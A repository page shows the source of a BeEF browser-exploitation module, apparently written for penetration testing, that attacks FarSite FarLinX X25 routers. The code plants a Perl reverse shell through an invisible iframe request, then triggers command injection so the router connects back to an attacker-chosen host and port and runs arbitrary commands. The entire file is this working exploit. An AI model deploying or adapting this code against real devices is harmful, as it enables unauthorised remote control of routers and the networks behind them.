Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
d47c69abb3f89a39198d7684e710996b8c64556c
beef/modules/exploits/farsite_x25_remote_shell/command.js
Eldar Marcussen b7ed74199c FarLinX X25 auth RCE module
2016-09-15 02:24:18 -04:00

40 lines
1.3 KiB
JavaScript
Raw Blame History

//
beef.execute(function() {
var rhost = '<%= @rhost %>';
var scheme = '<%= @scheme %>';
var lhost = '<%= @lhost %>';
var lport = '<%= @lport %>';
writefile = function() {
var revshell='use+IO;$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}';
revshell = revshell + '$c=new IO::Socket::INET(PeerAddr,"' + lhost + ':' + lport +'");';
revshell = revshell + 'STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};';
//var x25_write_iframe_<%= @command_id %>= beef.dom.createInvisibleIframe();
var x25w_<%= @command_id %>= beef.dom.createInvisibleIframe();
var uri = scheme + '://' + rhost + "/fsSaveUIPersistence.php?strSubmitData=" + revshell;
//About to hit uri
x25w_<%= @command_id %>.setAttribute('src', uri);
};
validate = function() {
};
exploit = function() {
//Command injecting on the router
var x25e_<%= @command_id %> = beef.dom.createInvisibleIframe();
var uri = scheme + '://' + rhost + "/fsx25MonProxy.php?strSubmitData=start+|perl</http/htdocs/fsUI.xyz;echo";
x25e_<%= @command_id %>.setAttribute('src', uri);
};
try {
writefile();
setTimeout(exploit,3000);
} catch (e) {
beef.debug(peer + " - Exploit failed: " + e.message);
}
});
Reference in New Issue View Git Blame Copy Permalink